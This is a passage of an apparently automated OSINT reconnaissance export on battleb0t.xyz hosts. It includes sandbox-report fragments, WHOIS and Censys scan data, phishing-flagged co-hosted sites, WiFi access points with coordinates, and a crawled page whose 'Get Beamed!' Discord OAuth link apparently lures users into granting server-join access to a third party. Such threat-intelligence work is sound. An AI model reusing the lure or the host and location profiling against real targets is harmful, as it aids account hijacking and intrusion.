[targetUID: 00000000-00003832]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00003832]\n "620BEF1064BD8E252C599957B3C91896" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\620BEF1064BD8E252C599957B3C91896]- [targetUID: 00000000-00003832]\n "analytics_3_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "QWUH7FY2.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QWUH7FY2.txt]- [targetUID: 00000000-00003024]\n "CabE40D.tmp" has type "Microsoft Cabinet archive data 61745 bytes 1 file"- Location: [%TEMP%\\CabE40D.tmp]- [targetUID: 00000000-00003832]\n "ce5327c52694093aede79fbdda65cf4496210956_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "~DFCA59CA6228C501E4.TMP" has type "data"- Location: [%TEMP%\\~DFCA59CA6228C501E4.TMP]- [targetUID: 00000000-00003024]\n "80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53]- [targetUID: 00000000-00003024]\n "logo-trustsing_1_.png" has type "PNG image data 242 x 50 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "A16C6C16D94F76E0808C087DFC657D99_B825D365EADB4B8BDCBA297C066E0152" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\A16C6C16D94F76E0808C087DFC657D99_B825D365EADB4B8BDCBA297C066E0152]- [targetUID: 00000000-00003832]'}, {u'category': u'Spyware/Information Retrieval', u'origin': u'API Call', u'identifier': u'api-113', u'name': u'Touches files in program files directory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': 
u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\sqmapi.dll"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IPHLPAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\CRYPTSP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\RPCRTREMOTE.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\DNSAPI.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\RASADHLP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\iexplore.exe"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\DHCPCSVC.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\MSIMG32.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\NCRYPT.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\BCRYPT.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\IEXPLORE.EXE.LOCAL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\WINHTTP.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\WEBIO.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\iexplore.exe.config"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\URL.DLL"\n "iexplore.exe" trying to touch file "C:\\Program Files\\Internet Explorer\\VERSION.DLL"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': 
u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.trustsign.com.br"- [ | 34.148.97.127 |
| 2023-05-12 03:01:32 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.79): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:20 | Web Content | No | Web Spider | 7 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Join the Discord</a>
<a href = "https://discord.com/api/oauth2/authorize?client_id=1073319920575713290&redirect_uri=https%3A%2F%2Fyoink.site%2Fauth&response_type=code&scope=identify%20guilds.join" class = "btn btn-primary btn-lg">Get Beamed!</a>
</div>
<div class = "row">
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/carti_3.JPG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nomnom.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/fredo.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jonas.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_1.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_2.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/master058_3.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/ein_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/reveloder.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_1.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/kappi_2.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_1.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_2.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_4.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/withat_5.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_1.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_2.jpeg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_3.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_4.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_5.png">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/random_6.PNG">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/jcqn.jpg">
</div>
</div>
<div class = "col-lg-4 col-sm-6">
<div class = "thumbnail">
<img src="/images/nwp.PNG">
</div>
</div>
</div>
</body>
</html>
| funny.battleb0t.xyz |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2086 | 172.67.135.9 |
| 2023-05-12 02:53:00 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | Cloudflare Inc. Cloudflare | oldfluid.battleb0t.xyz |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +14806242598 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
|
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | \012\034\030\003\031\003\007\024\022\001\035\027\0 (Net ID: 00:05:4E:45:3B:FE) | 39.0469, -77.4903 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | linux | 64.226.81.43 |
| 2023-05-12 03:08:55 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.81 | 34.74.170.74 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | BLINK-6985 (Net ID: 00:03:7F:A1:AE:79) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-001-0.github.io | 185.199.111.153 |
| 2023-05-12 03:03:47 | Co-Hosted Site | No | ThreatMiner | 2 | 0 | 2 | 0 | None | james-gamboa.github.io | 185.199.111.153 |
| 2023-05-12 02:54:16 | Web Content | No | Web Spider | 0 | 0 | 4 | 0 | None | /**
* dat-gui JavaScript Controller Library
* http://code.google.com/p/dat-gui
*
* Copyright 2011 Data Arts Team, Google Creative Lab
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*/
| https://oldfluid.battleb0t.xyz/dat.gui.min.js |
| 2023-05-12 02:44:47 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | HSTS | panel.battleb0t.xyz |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-001-0.github.io]
https://www.openphish.com/feed.txt | 0-001-0.github.io |
| 2023-05-12 02:54:20 | HTTP Headers | No | Web Spider | 2 | 0 | 4 | 0 | None | {"x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "expires": "Fri, 12 May 2023 04:54:20 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "last-modified": "Fri, 28 Apr 2023 14:11:18 GMT", "connection": "keep-alive", "etag": "W/\"644bd406-1f4d\"", "cache-control": "max-age=7200, public", "date": "Fri, 12 May 2023 02:54:20 GMT", "cf-ray": "7c5f605fb97f4259-EWR", "content-type": "text/css", "x-frame-options": "DENY"} | http://nuke.battleb0t.xyz/cdn-cgi/styles/main.css |
| 2023-05-12 03:00:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.1): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:00:26 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | zlib@openssh.com | {"operating_system": {"product": "Linux", "vendor": "Debian", "version": "10.2", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}, "last_updated_at": "2023-05-11T13:12:22.896Z", "ip": "64.226.81.43", "labels": ["remote-access"], "location_updated_at": "2023-05-04T23:08:56.702518Z", "autonomous_system_updated_at": "2023-05-04T23:08:56.702593Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"kvydol.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-05T17:01:10.039852254Z"}, "kekw.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-09T21:51:41.360251198Z"}, "wordpress-971118-3396556.cloudwaysapps.com": {"record_type": "A", "resolved_at": "2023-05-02T09:46:47.851165352Z"}}, "names": ["kvydol.easypanel.host", "kekw.battleb0t.xyz", "wordpress-971118-3396556.cloudwaysapps.com"], "reverse_dns": {"resolved_at": "2023-04-25T12:49:47.725442827Z", "names": ["971118.cloudwaysapps.com"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:989054422845f7fb4a0f578fbb62a589973974ff9b7310e0eee11f9d1819efdb"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T11:58:34.839347829Z", "banner_hex": "5353482d322e302d4f70656e5353485f372e3970312044656269616e2d31302b64656231307532", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "65160,64,true,MSTNW,1460,false,false", "os": "CentOS", "id": 262}, "banner": 
"SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "0172e87daef36c52da4bd5592787fb64e976f73f4f61384a12164ac56f2ce5a1", "rsa_public_key": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 2048, "modulus": "uPxDpRdIrA/iz2ExEgRAxKmXST2zSxUUASzEIsL6O2PTrSNc6umFNFt/dHdxbK0YoU5gp4vR8iK16J/is3qdC1O0ZbGjQDlTCf7Ot9E/wR2JFzowSc1s9mpCkXPL2tjFtwBDcuHkmqou6ryP5VE5ak4jNCg57zigC0YIUbaIQBZ2jxMULPFDZH04Sm7BCi6dspyzcLPQj8OZRf2GyAISVhP0sEJYaziXVgNTRAQlqfYIDf9Nzlq1NseWj/r6MQ8+fir5bRq/WXlDIO3L0kx/XXBOQazwt1JhrESalbK3qpruuXFPUsHNFo5uT3KgeXHGYW3PgarxkIAvPDmJRHKYqQ==", "exponent": "AAEAAQ=="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ssh-rsa", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ssh-rsa"], "client_to_server_compression": ["none", "zlib@openssh.com"], "server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256", "diffie-hellman-group14-sha1"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": 
["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Debian-10+deb10u2", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_7.9p1", "raw": "SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2"}, "hassh_fingerprint": "b12d2871a1189eff20364cf5333619ee"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Debian-10+deb10u2"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "7.9", "update": "p1", "source": "OSI_APPLICATION_LAYER", "part": "a", "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:7.9:p1:*:*:*:*:*:*", "other": {"family": "OpenSSH"}}, {"product": "Linux", "vendor": "Debian", "version": "10.2", "source": "OSI_APPLICATION_LAYER", "other": {"family": "Linux"}, "uniform_resource_identifier": "cpe:2.3:o:debian:debian_linux:10.2:*:*:*:*:*:*:*", "part": "o"}]}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://64.226.81.43/"}, "response": {"body": "<!DOCTYPE html>\n<html>\n <iframe src=\"https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html\" frameborder=\"0\" 
style=\"overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px\" height=\"100%\" width=\"100%\"></iframe>\n</html> ", "_encoding": {"body": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "protocol": "HTTP/1.1", "headers": {"_encoding": {"Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Vary": ["Accept-Encoding"], "Server": ["nginx"], "Connection": ["keep-alive"], "Etag": ["W/\"64217dc5-156\""], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]}, "body_hashes": ["sha256:d5e3078cb88ba53faa1d104c27054d2a8ff92665b4c02144f55489bf5c254016", "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf"], "status_code": 403, "body_hash": "sha1:5d4eb7befed38d050a2b1adaa91de040a5beb9bf", "body_size": 342, "status_reason": "Forbidden"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:888a2d848f3d16b40c32b4ff30abaadaacb398a98d5a44f4a0237b14ce63d529"], "source_ip": "167.248.133.36", "extended_service_name": "HTTP", "observed_at": "2023-05-11T05:48:53.194396164Z", "banner_hex": "485454502f312e312034303320466f7262696464656e0d0a5365727665723a206e67696e780d0a446174653a20203c52454441435445443e0d0a436f6e74656e742d547970653a20746578742f68746d6c0d0a5472616e736665722d456e636f64696e673a206368756e6b65640d0a436f6e6e656374696f6e3a206b6565702d616c6976650d0a566172793a204163636570742d456e636f64696e670d0a455461673a20572f2236343231376463352d313536220d0a436f6e74656e742d456e636f64696e673a20677a69700d0a", "perspective_id": "PERSPECTIVE_NTT", "banner": "HTTP/1.1 403 Forbidden\r\nServer: nginx\r\nDate: <REDACTED>\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nVary: Accept-Encoding\r\nETag: W/\"64217dc5-156\"\r\nContent-Encoding: gzip\r\n", "port": 80, "software": [{"product": "nginx", "vendor": "nginx", "source": 
